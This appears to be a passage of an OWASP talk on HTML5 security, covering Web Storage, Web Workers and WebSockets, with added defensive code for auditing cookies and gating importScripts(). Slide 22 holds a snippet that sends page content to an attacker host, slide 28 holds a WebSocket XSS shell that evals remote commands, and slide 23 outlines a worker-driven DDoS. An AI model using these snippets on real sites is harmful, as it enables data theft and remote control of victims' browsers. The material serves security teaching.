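Slides 12 through 15 make one point: a session identifier in sessionStorage or localStorage has no httpOnly or path attribute, so any script running in the origin can read it. The mitigation is to keep the session identifier in a cookie that carries those attributes and to leave Web Storage for data that is safe to expose to script. The following is an added example (not from the talk): a small Set-Cookie auditor that reports which hardening attributes a session cookie lacks, next to a builder that emits a cookie with all of them. The cookie name __Host-SessionID and the values are constructed; the attribute semantics and the __Host- prefix rules are the browser's.

```javascript
// Added example: audit a Set-Cookie header for the attributes that Web Storage
// cannot offer. Cookie names and values below are constructed sample data.

// Parse "name=value; Attr; Attr=val" into its parts. Attribute names are
// case-insensitive, so they are lower-cased; flag attributes map to true.
function parseSetCookie(header) {
  const parts = header.split(";").map((p) => p.trim()).filter(Boolean);
  const [name, ...rest] = parts[0].split("=");
  const attrs = {};
  for (const p of parts.slice(1)) {
    const eq = p.indexOf("=");
    const key = (eq === -1 ? p : p.slice(0, eq)).trim().toLowerCase();
    attrs[key] = eq === -1 ? true : p.slice(eq + 1).trim();
  }
  return { name: name.trim(), value: rest.join("="), attrs };
}

// Return a list of finding codes; an empty list means the cookie is hardened.
//   no-httponly                 value readable by script, same exposure as sessionStorage
//   no-secure                   cookie also sent over plaintext HTTP
//   no-samesite                 sent on cross-site requests (CSRF surface)
//   samesite-none-without-secure  browsers reject SameSite=None without Secure
//   bad-host-prefix             __Host- requires Secure, Path=/ and no Domain
function auditSetCookie(header) {
  const { name, attrs } = parseSetCookie(header);
  const findings = [];
  if (!attrs.httponly) findings.push("no-httponly");
  if (!attrs.secure) findings.push("no-secure");
  if (!attrs.samesite) findings.push("no-samesite");
  else if (String(attrs.samesite).toLowerCase() === "none" && !attrs.secure) {
    findings.push("samesite-none-without-secure");
  }
  if (name.startsWith("__Host-") && ("domain" in attrs || attrs.path !== "/" || !attrs.secure)) {
    findings.push("bad-host-prefix");
  }
  return findings;
}

// Builder for a session cookie that passes the audit: script cannot read it
// (HttpOnly), it travels only over TLS (Secure), it is not attached to cross-site
// requests (SameSite=Lax), and the __Host- prefix pins it to this host and Path=/.
function hardenedSessionCookie(sessionId) {
  return `__Host-SessionID=${encodeURIComponent(sessionId)}; Path=/; Secure; HttpOnly; SameSite=Lax`;
}

module.exports = { parseSetCookie, auditSetCookie, hardenedSessionCookie };
```

Run the auditor over the Set-Cookie headers of a login response; anything other than an empty list for the session cookie means the identifier is no better protected than it would be in sessionStorage.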
17. Web workers

•   API for spawning background scripts in a web application via JavaScript.
     o   Real OS-level threads and concurrency.
     o   Managed communication through posting messages to the background worker.
•   Web Workers run in an isolated thread.
•   Workers do NOT have access to: DOM, window, document, and parent objects.
•   Security validation is based on the same-origin principle.
18. Spawning a worker

    http://owasp.org/index.html

        <script>
        var worker = new Worker("worker.js");
        worker.onmessage = function(event){
            // show whatever the worker sends back
            document.getElementById('response').textContent = event.data;
        };
        worker.postMessage('start');   // postMessage() requires an argument; any value wakes the worker
        </script>
        …
        <pre id="response" value=" ">

    http://owasp.org/worker.js

        self.onmessage = function(event){
            self.postMessage('Hello World');
        };
19. Workers – Available features

•   The location object (read-only).
•   The navigator object.
•   setTimeout()/clearTimeout() and setInterval()/clearInterval().
•   Spawning other web workers.
•   postMessage()
     o   send data to the worker (strings, JSON objects, etc.).
•   Event support (addEventListener, dispatchEvent, removeEventListener).
•   importScripts()
     o   importScripts('http://external.com/script.js');
•   XMLHttpRequest.
20. Sending data to worker

    http://owasp.org/index.html

        <script>
        var worker = new Worker("worker.js");
        worker.onmessage = function(event){
            document.getElementById('response').textContent = event.data;
        };
        worker.postMessage('Hello OWASP Floripa');
        </script>

    http://owasp.org/worker.js

        self.onmessage = function(event){
            // echo the received data back; the Event object itself cannot be cloned across threads
            self.postMessage(event.data);
        };
21. Attack: Bypass SOP with importScripts()

•   Workers make a natural sandbox for running untrusted code.
•   Workers can't access page content.
•   importScripts() permits running third-party code in your domain.

    http://owasp.org/teste.js

        var sandbox = new Worker('sandbox.js');
        sandbox.postMessage('http://external.site/badguy.js');

    http://owasp.org/sandbox.js

        onmessage = function(e){
            importScripts(e.data);
            postMessage(this['someUntrustedFunction']());
        }
22. Attack: Bypass SOP with importScripts() (DEMO)

•   But workers can run XMLHttpRequests
     o   The script is running in the domain of the parent page (http://owasp.org/teste.js).
     o   It can read any content on your domain.

    http://external.site/badguy.js

        var xhr = new XMLHttpRequest();
        xhr.open('GET', 'http://owasp.org/index.html', true);
        xhr.send();
        xhr.onreadystatechange = function(remote_data){
            if (remote_data.target.readyState == 4){
                var remote_data = remote_data.target.responseText;
                importScripts('http://external.site/remote-page-content=' + remote_data);
            };
        };
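The weakness in slides 21 and 22 is that sandbox.js passes an attacker-controlled string straight to importScripts(), which runs the fetched code with the worker's own origin. The fix is to resolve the requested script against the page origin and refuse anything that does not land on the same origin before importing it. The following is an added example (not from the talk) of that check, written as plain functions so it can be tested outside a browser; the page origin http://owasp.org is taken from the slide, the other URLs are constructed, and importFn stands in for the real importScripts().

```javascript
// Added example: same-origin gate in front of importScripts().
// pageOrigin comes from the slide; the requested URLs below are constructed.

// True only if `requested`, resolved the way the worker would resolve it,
// is an http(s) URL on exactly the page's origin (scheme, host and port).
function isSameOriginScript(requested, pageOrigin) {
  let url;
  try {
    url = new URL(requested, pageOrigin); // relative paths resolve against the page
  } catch (e) {
    return false; // unparsable input is never imported
  }
  // blob:, data:, javascript: and friends would execute in the worker's
  // context without any origin to compare, so only http(s) is accepted.
  if (url.protocol !== "http:" && url.protocol !== "https:") return false;
  return url.origin === new URL(pageOrigin).origin;
}

// Worker-side wrapper: resolve, check, then hand the absolute URL to the real
// importScripts (passed in as importFn so this can run under Node for testing).
function guardedImport(requested, pageOrigin, importFn) {
  if (!isSameOriginScript(requested, pageOrigin)) {
    throw new Error("refusing to import cross-origin script: " + requested);
  }
  const href = new URL(requested, pageOrigin).href;
  importFn(href);
  return href;
}

// Inside a real worker the gate would be wired like this (browser-only, so left
// as a comment here):
//   onmessage = function (e) {
//     guardedImport(e.data, self.location.origin, importScripts);
//   };

module.exports = { isSameOriginScript, guardedImport };
```

The comparison is on the parsed origin, not on the string, so protocol-relative URLs (//external.site/x.js), userinfo tricks (http://owasp.org@external.site/x.js) and a scheme change to https all fail the check even though each contains the expected host name.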
23. Attack: DDoS with CORS and Web Workers

•   Start a Web Worker that fires multiple cross-origin requests at the target.
•   Thanks to CORS, it can send GET/POST requests to any website.
•   Sending a cross-domain GET request is nothing new (IMG tag or SCRIPT).
•   So simply by getting someone to visit a URL you can get them to send 10,000 HTTP requests/minute.
•   Can be spread with social engineering techniques (malicious URL, XSS vulnerabilities).
24. Attack: DDoS with CORS and Web Workers (DEMO)

    [Diagram: the attacker injects an XSS payload into a vulnerable XSS web site; the XSS victims' browsers then send requests to the target web site.]
26. Web Sockets

•   Web Sockets is a web technology that provides bi-directional, full-duplex communication channels over a single TCP connection.
•   The connection is established by upgrading from HTTP to the Web Socket protocol.
•   Web servers are now able to send content to the browser without being solicited by the client, which allows messages to be passed back and forth while keeping the connection open.
•   URI Scheme: ws:// and wss://
•   Threats that can be exploited:
     o   Remote Shell, Web-Based Botnet, Port scanning
28. Web Sockets – XSS Shell (DEMO)

        <script>
        var connection = new WebSocket('ws://attacker-ip:port');
        connection.onopen = function (){
            connection.send('null');
        };
        connection.onmessage = function(event){
            eval(event.data);
        };
        </script>
29. References

•   The WebSocket Protocol (http://tools.ietf.org/html/rfc6455)
•   Web Workers (http://www.w3.org/TR/workers/)
•   Web Storage (http://www.w3.org/TR/webstorage/)
•   Attack & Defense Labs (http://blog.andlabs.org/)
•   HTML5 Rocks (http://www.html5rocks.com/)
•   HTML5 Web Security - Michael Schmidt
•   The World According to KOTO (http://blog.kotowicz.net/)
•   Shreeraj's security blog (http://shreeraj.blogspot.in/)